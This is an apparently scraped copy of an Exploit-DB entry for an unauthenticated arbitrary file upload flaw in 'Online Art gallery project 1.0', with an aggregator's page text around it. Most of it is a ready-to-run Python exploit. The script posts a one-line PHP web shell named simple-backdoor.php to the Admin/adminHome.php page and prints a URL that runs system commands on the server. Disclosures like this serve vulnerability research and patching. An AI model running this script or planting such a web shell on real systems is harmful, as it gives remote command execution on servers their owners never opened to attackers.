7
[webapps] Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticate...
source link: https://www.exploit-db.com/exploits/51524
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
EDB-ID:
51524
EDB Verified:
# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
# Google Dork: n/a
# Date: 14/06/2023
# Exploit Author: Ramil Mustafayev
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a
# Vulnerability Description:
#
# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
# Usage: python exploit.py http://example.com
import requests
import sys
def upload_file(url, filename, file_content):
files = {
'sliderpic': (filename, file_content, 'application/octet-stream')
}
data = {
'img_id': '',
'sliderPicSubmit': ''
}
url = url+"/Admin/adminHome.php"
try:
response = requests.post(url, files=files, data=data)
except:
print("[!] Exploit failed!")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python exploit.py <target_url>")
sys.exit(1)
target_url = sys.argv[1]
file_name = "simple-backdoor.php"
file_content = '<?php system($_GET["c"]);?>'
upload_file(target_url, file_name, file_content)
print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK